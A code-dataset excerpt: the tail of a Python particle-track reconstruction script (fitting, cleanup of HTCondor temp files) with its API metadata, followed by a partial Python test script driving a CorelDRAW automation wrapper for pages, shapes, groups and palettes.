Bad_Tracks['new_y']=Bad_Tracks['ay']+(Bad_Tracks[PM.z]*Bad_Tracks['t1y'])+((Bad_Tracks[PM.z]**2)*Bad_Tracks['t2y'])\n\n #Calculating how far hits deviate from the fit polynomial\n print(UF.TimeStamp(),'Calculating how far hits deviate from the fit polynomial...')\n Bad_Tracks['d_x']=Bad_Tracks[PM.x]-Bad_Tracks['new_x']\n Bad_Tracks['d_y']=Bad_Tracks[PM.y]-Bad_Tracks['new_y']\n\n Bad_Tracks['d_r']=Bad_Tracks['d_x']**2+Bad_Tracks['d_y']**2\n Bad_Tracks['d_r'] = Bad_Tracks['d_r'].astype(float)\n Bad_Tracks['d_r']=np.sqrt(Bad_Tracks['d_r']) #Absolute distance\n Bad_Tracks=Bad_Tracks[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z,PM.Hit_ID,'d_r']]\n\n #Sort the tracks and their hits by Track ID, Plate and distance to the perfect line\n print(UF.TimeStamp(),'Sorting the tracks and their hits by Track ID, Plate and distance to the perfect line...')\n Bad_Tracks.sort_values([RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z,'d_r'],ascending=[0,0,1,1],inplace=True)\n\n #If there are two hits per plate we will keep the one which is closer to the line\n Bad_Tracks.drop_duplicates(subset=[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z],keep='first',inplace=True)\n Bad_Tracks=Bad_Tracks[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.Hit_ID]]\n Good_Tracks=pd.concat([Good_Tracks,Bad_Tracks]) #Combine all ANNDEA tracks together\n Data=pd.merge(Data,Good_Tracks,how='left', on=[PM.Hit_ID]) #Re-map corrected ANNDEA Tracks back to the main data\n output_file_location=EOS_DIR+'/ANNDEA/Data/REC_SET/'+RecBatchID+'_RTr_OUTPUT_CLEANED.csv' #Final output. We can use this file for further operations\n Data.to_csv(output_file_location,index=False)\n print(UF.TimeStamp(), bcolors.OKGREEN+\"The tracked data has been written to\"+bcolors.ENDC, bcolors.OKBLUE+output_file_location+bcolors.ENDC)\n print(UF.TimeStamp(),bcolors.OKGREEN+'Stage 4 has successfully completed'+bcolors.ENDC)\n Status=4\n except Exception as e:\n print(UF.TimeStamp(),bcolors.FAIL+'Stage 4 is uncompleted due to: '+str(e)+bcolors.ENDC)\n Status=5\n break\nif Status==4:\n # Removing the temp files that were generated by the process\n print(UF.TimeStamp(),'Performing the cleanup... ',bcolors.ENDC)\n HTCondorTag=\"SoftUsed == \\\"ANNDEA-RTr1a-\"+RecBatchID+\"\\\"\"\n UF.RecCleanUp(AFS_DIR, EOS_DIR, 'RTr1a_'+RecBatchID, [], HTCondorTag)\n HTCondorTag=\"SoftUsed == \\\"ANNDEA-RTr1b-\"+RecBatchID+\"\\\"\"\n UF.RecCleanUp(AFS_DIR, EOS_DIR, 'RTr1b_'+RecBatchID, [], HTCondorTag)\n for p in Program:\n if p!='Custom':\n print(UF.TimeStamp(),UF.ManageTempFolders(p,'Delete'))\n print(UF.TimeStamp(), bcolors.OKGREEN+\"Reconstruction has been completed\"+bcolors.ENDC)\n exit()\nelse:\n print(UF.TimeStamp(), bcolors.FAIL+\"Reconstruction has not been completed as one of the processes has timed out or --ForceStatus!=0 option was chosen. 
Please run the script again (without Reset Mode).\"+bcolors.ENDC)\n exit()\n\n\n\n", "repo_name": "FilipsFedotovs/ANNDEA", "sub_path": "Code/RTr1_ReconstructTracks.py", "file_name": "RTr1_ReconstructTracks.py", "file_ext": "py", "file_size_in_byte": 42676, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "csv.reader", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 25, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pandas.options", "line_number": 28, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 53, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 83, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 101, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 111, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 119, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 121, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 124, "usage_type": "call"}, {"api_name": "Parameters.stepX", "line_number": 128, "usage_type": "attribute"}, {"api_name": "Parameters.stepY", "line_number": 129, "usage_type": "attribute"}, {"api_name": "Parameters.stepZ", "line_number": 130, "usage_type": "attribute"}, {"api_name": "Parameters.cut_dt", "line_number": 131, "usage_type": "attribute"}, {"api_name": "Parameters.cut_dr", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.PickleOperations", "line_number": 134, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 143, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 150, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 151, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 153, "usage_type": "attribute"}, {"api_name": "Parameters.x", "line_number": 153, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 153, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 153, "usage_type": "attribute"}, {"api_name": 
"Parameters.tx", "line_number": 153, "usage_type": "attribute"}, {"api_name": "Parameters.ty", "line_number": 153, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 155, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 156, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 157, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 160, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 162, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 164, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 165, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 168, "usage_type": "call"}, {"api_name": "Parameters.x", "line_number": 169, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 169, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 171, "usage_type": "call"}, {"api_name": "Parameters.x", "line_number": 172, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 173, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 174, "usage_type": "attribute"}, {"api_name": "Parameters.tx", "line_number": 175, "usage_type": "attribute"}, {"api_name": "Parameters.ty", "line_number": 176, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 177, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 178, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 183, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 185, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 195, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 197, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 200, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 202, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 203, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 214, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 216, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 220, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 221, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 222, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 227, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 229, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 240, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 242, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 245, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 247, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 253, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 256, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 258, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 259, "usage_type": "call"}, {"api_name": "UtilityFunctions.CreateCondorJobs", "line_number": 260, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 274, "usage_type": "call"}, {"api_name": "UtilityFunctions.SubmitJobs2Condor", "line_number": 277, "usage_type": "call"}, {"api_name": 
"UtilityFunctions.TimeStamp", "line_number": 278, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 285, "usage_type": "call"}, {"api_name": "UtilityFunctions.CreateCondorJobs", "line_number": 287, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 301, "usage_type": "call"}, {"api_name": "UtilityFunctions.CreateCondorJobs", "line_number": 306, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 319, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 323, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 324, "usage_type": "call"}, {"api_name": "UtilityFunctions.SubmitJobs2Condor", "line_number": 326, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 329, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 332, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 335, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 341, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 347, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 353, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 354, "usage_type": "call"}, {"api_name": "UtilityFunctions.SubmitJobs2Condor", "line_number": 356, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 358, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 360, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 363, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 366, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 370, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 373, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 376, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 382, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 383, "usage_type": "call"}, {"api_name": "UtilityFunctions.SubmitJobs2Condor", "line_number": 385, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 388, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 391, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 394, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 400, "usage_type": "call"}, {"api_name": "UtilityFunctions.RecCleanUp", "line_number": 402, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 423, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 423, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 425, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 425, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 438, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 438, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 440, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 440, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 453, "usage_type": "call"}, {"api_name": 
"UtilityFunctions.ManageTempFolders", "line_number": 453, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 455, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 455, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 461, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 462, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 481, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 485, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 486, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 488, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 490, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 491, "usage_type": "attribute"}, {"api_name": "Parameters.x", "line_number": 494, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 494, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 501, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 502, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 502, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 510, "usage_type": "call"}, {"api_name": "Parameters.x", "line_number": 511, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 511, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 511, "usage_type": "attribute"}, {"api_name": "Parameters.tx", "line_number": 511, "usage_type": "attribute"}, {"api_name": "Parameters.ty", "line_number": 511, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 511, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 519, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 521, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 521, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 521, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 523, "usage_type": "call"}, {"api_name": "Parameters.z", "line_number": 524, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 524, "usage_type": "attribute"}, {"api_name": "Parameters.MinHitsTrack", "line_number": 525, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 527, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 528, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 530, "usage_type": "attribute"}, {"api_name": "Parameters.x", "line_number": 533, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 533, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 533, "usage_type": "attribute"}, {"api_name": "Parameters.tx", "line_number": 533, "usage_type": "attribute"}, {"api_name": "Parameters.ty", "line_number": 533, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 533, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 536, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 536, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 537, "usage_type": "attribute"}, {"api_name": 
"Parameters.Hit_ID", "line_number": 537, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 538, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 543, "usage_type": "call"}, {"api_name": "Parameters.z", "line_number": 543, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 547, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 550, "usage_type": "call"}, {"api_name": "os.path", "line_number": 550, "usage_type": "attribute"}, {"api_name": "alive_progress.alive_bar", "line_number": 559, "usage_type": "call"}, {"api_name": "alive_progress.alive_bar", "line_number": 579, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 602, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 603, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 604, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 605, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 624, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 625, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 626, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 628, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 629, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 630, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 642, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 644, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 647, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 648, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 657, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 658, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 662, "usage_type": "call"}, {"api_name": "Parameters.z", "line_number": 664, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 665, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 668, "usage_type": "call"}, {"api_name": "Parameters.x", "line_number": 669, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 670, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 674, "usage_type": "call"}, {"api_name": "Parameters.z", "line_number": 675, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 675, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 678, "usage_type": "call"}, {"api_name": "Parameters.z", "line_number": 679, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 682, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 683, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 684, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 685, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 685, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 688, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 689, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 692, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 697, "usage_type": "call"}, {"api_name": "UtilityFunctions.RecCleanUp", 
"line_number": 699, "usage_type": "call"}, {"api_name": "UtilityFunctions.RecCleanUp", "line_number": 701, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 704, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 704, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 705, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 708, "usage_type": "call"}]} +{"seq_id": "36155917683", "text": "from cdr import CDR\nfrom PIL import Image,ImageDraw,ImageFont\nfrom fontTools.ttLib import TTFont\nfrom fontTools.ttLib.tables._c_m_a_p import CmapSubtable\n\n# 打开文档\ndef open():\n print(CDR('C:\\\\Users\\\\Administrator\\\\Desktop\\\\11.cdr'))\n\n# 获页面内容\n# 传递页面搜索\n# 不传,默认获取所有页面数据\ndef getContent(pageIndex=\"\"):\n print('返回', CDR().get(pageIndex))\n\n\n# 获取指定页面的全部内容字段\ndef setContent(pageIndex=\"\",path=\"\"):\n data = {'logo': {'pageIndex': 1, 'value': 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\1.png'}}\n CDR().set(data)\n\n\n# 页面页面,传递不同页面的索引 1开始, 第一页1,第二页2\ndef togglePage():\n print(CDR().togglePage(2))\n \n\n# 创建边界三角形\ndef drawDecorationTriangle():\n # CDR().groupDecorationTriangle()\n CDR().drawDecorationTriangle(\"test\",{\"background-color\":[255, 0, 0]},{\"bottom\":300,\"left\":600},'lefttop') \n CDR().drawDecorationTriangle(\"test\",{\"background-color\":[255, 0, 0]},{\"bottom\":300,\"right\":600},'righttop') \n CDR().drawDecorationTriangle(\"test\",{\"background-color\":[255, 0, 0]},{\"top\":300,\"left\":600},'leftbottom') \n CDR().drawDecorationTriangle(\"test\",{\"background-color\":[255, 0, 0]},{\"top\":300,\"right\":600},'rightbottom') \n\n\n#测试图片裁剪\ndef testPowerClip():\n d1 = CDR()\n layer = d1.getLayer(\"秒秒学装饰\")\n # 必须设置活动的layer,这样调用vb.exe才会在这个layer的内部\n layer.Activate()\n imgShape = d1.addImage(layer,\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\1.png\")\n #设置单位像素\n d1.doc.Unit = 5\n ellipse = layer.CreateEllipse(100, 100, 500, 500)\n imgShape.AddToSelection()\n imgShape.AddToPowerClip(ellipse)\n\n\n# 测试分组\ndef testGroup():\n cdrObj = CDR()\n layer = cdrObj.getLayer(\"秒秒学装饰\")\n s1 = layer.FindShape(\"test1\")\n s2 = layer.FindShape(\"test2\")\n s3 = layer.FindShape(\"test3\")\n s4 = layer.FindShape(\"test4\")\n\n # 创建4个边界三角形\n if s1 == None:\n s1 = cdrObj.drawDecorationTriangle(\"test1\",{\"background-color\":[255, 0, 0]},{\"bottom\":300,\"left\":600},'lefttop') \n if s2 == None:\n s2 = cdrObj.drawDecorationTriangle(\"test2\",{\"background-color\":[255, 0, 0]},{\"top\":300,\"right\":600},'rightbottom') \n if s3 == None:\n s3 = cdrObj.drawDecorationTriangle(\"test3\",{\"background-color\":[255, 0, 0]},{\"top\":300,\"right\":600},'rightbottom') \n if s4 == None:\n s4 = cdrObj.drawDecorationTriangle(\"test4\",{\"background-color\":[255, 0, 0]},{\"top\":300,\"right\":600},'rightbottom') \n\n\n# 测试组对象移动\ndef addShapeToGroup():\n cdrObj = CDR()\n layerObj = cdrObj.getLayer('秒秒学装饰')\n g1 = cdrObj.groupShapeObjs(layerObj,\"占位组\",)\n g2 = cdrObj.groupShapeObjs(layerObj,\"子组占位组1\",g1)\n g3 = cdrObj.groupShapeObjs(layerObj,\"子组占位组2\",g2)\n g4 = cdrObj.groupShapeObjs(layerObj,\"子���占位组3\",g3)\n\n s1 = layerObj.FindShape(\"test1\")\n if s1 == None:\n s1 = cdrObj.drawDecorationTriangle(\"test1\",{\"background-color\":[255, 0, 0]},{\"bottom\":300,\"left\":600},'lefttop') \n\n # 增加一个对象到组\n cdrObj.addShapeToGroup(g4,s1)\n\n\n# 从组中删除一个对象,维持组的持久性\ndef removGroupShapeObjs():\n cdrObj = CDR()\n layerObj = cdrObj.getLayer('秒秒学装饰')\n g1 = 
cdrObj.groupShapeObjs(layerObj,\"占位组\",)\n    g2 = cdrObj.groupShapeObjs(layerObj,\"子组占位组1\",g1)\n    g3 = cdrObj.groupShapeObjs(layerObj,\"子组占位组2\",g2)\n    g4 = cdrObj.groupShapeObjs(layerObj,\"子组占位组3\",g3)\n\n    s1 = layerObj.FindShape(\"test1\")\n    if s1 == None:\n        s1 = cdrObj.drawDecorationTriangle(\"test1\",{\"background-color\":[255, 0, 0]},{\"bottom\":300,\"left\":600},'lefttop') \n\n    # Add an object to the group\n    cdrObj.addShapeToGroup(g4,s1)\n    # Remove an object from the group, but keep the group itself alive\n    cdrObj.removGroupShapeObjs(g4,s1)\n\n\n# Remove an object from a group without keeping the group alive\ndef deleteGroupShapeObjs():\n    cdrObj = CDR()\n    layerObj = cdrObj.getLayer('秒秒学装饰')\n    g1 = cdrObj.groupShapeObjs(layerObj,\"占位组\",)\n    g2 = cdrObj.groupShapeObjs(layerObj,\"子组占位组1\",g1)\n    g3 = cdrObj.groupShapeObjs(layerObj,\"子组占位组2\",g2)\n    g4 = cdrObj.groupShapeObjs(layerObj,\"子组占位组3\",g3)\n\n    s1 = layerObj.FindShape(\"test1\")\n    if s1 == None:\n        s1 = cdrObj.drawDecorationTriangle(\"test1\",{\"background-color\":[255, 0, 0]},{\"bottom\":300,\"left\":600},'lefttop') \n\n    # Add an object to the group\n    cdrObj.addShapeToGroup(g4,s1)\n    cdrObj.deleteGroupShapeObjs(g4,s1)\n\n\n# Move an object\ndef moveToMiddle():\n    cdrObj = CDR()\n    # cdrObj.moveToLandscapeMiddle(\"测试1\")\n    # cdrObj.moveToLeft(obj)\n    # cdrObj.moveToRight('测试1')\n    # cdrObj.moveToTop('测试1')\n    # cdrObj.moveToBottom('测试1')\n    # cdrObj.moveToVerticalMiddle('测试1')\n    cdrObj.moveToCenter('测试1')\n\n\n# Change the font size\ndef increaseFontSize():\n    cdrObj = CDR()\n    cdrObj.loadPalette('C:\\\\Users\\\\Administrator\\\\Desktop\\\\123\\\\cw.xml')\n    # cdrObj.addFontSize('测试1',24)\n    # cdrObj.reduceFontSize('测试1',15)\n    # cdrObj.setColor('测试1',[255,0,0])\n\ndef testColor():\n    cdrObj = CDR()\n    # cdrObj.setColor('测试1',[255,0,0])\n    cdrObj.createPage(5)\n\n\n# Combined test\ndef combineTest():\n    cdrObj = CDR()\n    obj = cdrObj.insertParaText([0, 0, 120, 500],'测试1','我是内容123123大1sdfasfsfsdf2312dfsadfsfsdf1111我是内容123123大1sdfasfsfsdf2312dfsadfsfsdf111111')\n    cdrObj.setColor(obj,[255,0,0])\n    cdrObj.addFontSize(obj,24)\n    cdrObj.moveToCenter(obj)\n    cdrObj.modifyParaText(obj,'dfs123123大1sdfasfsfsdf2312dfsadfsfsdf11111我是内容123123大1sdfasfsfsdf2312dfsadfsfsdf11111我是内容123123大1sdfasfsfsdf2312dfsadfsfsdf11111我是内容123123大1sdfasfsfsdf2312dfsadfsfsdf11111我是内容123123大1sdfasfsfsdf2312dfsadfsfsdf11111',[5, 50, 100, 50],'','')\n    cdrObj.setFontSize(obj,10)\n\n\n    #Create a palette and add a color object to it\ndef paletteTest1():\n    cdrObj = CDR()\n    paletteObj = cdrObj.accessPalette('my') \n    cdrObj.setPletteEnabled(paletteObj) #Enable it\n    # Create a color object in the specified format\n    color = cdrObj.createColorObj([110,128,255],'unique_key','RGB') \n    # Add the color to the palette\n    cdrObj.addPletteColor(paletteObj,color)\n\n\n#Test the palette: replace a color\ndef paletteTest2():\n    cdrObj = CDR()\n    paletteObj = cdrObj.accessPalette('my') \n    newColor = cdrObj.createColorObj([0,255,255],'unique_key','RGB') \n    cdrObj.replacePletteColorByName(paletteObj,newColor)\n\n\n# Test the palette: get a specified color from the palette\ndef paletteTest3():\n    cdrObj = CDR()\n    print(cdrObj.app.Printers)\n\n    # cdrObj.test()\n    # paletteObj = cdrObj.accessPalette('test-paletter')\n    # cdrObj.setPletteDefault(paletteObj)\n\n    # Get the color object \n    # colorObj = cdrObj.getPaletteColor(paletteObj,'unique_key')\n    # Get its values\n    # cmykValue = cdrObj.getColorValue(colorObj,'CMYK')\n    # rgbValue = cdrObj.getColorValue(colorObj,'RGB')\n    # hsbValue = cdrObj.getColorValue(colorObj,'HSB')\n    # hlsValue = cdrObj.getColorValue(colorObj,'HLS')\n    # cmkValue = cdrObj.getColorValue(colorObj,'CMY')\n    # print(colorObj)\n\n\n# Import a file and replace an object\ndef replacePart():\n    cdrObj = CDR()\n    # Load the mytest object from the cdr file at the given path\n    # and replace it into the specified object\n    # 
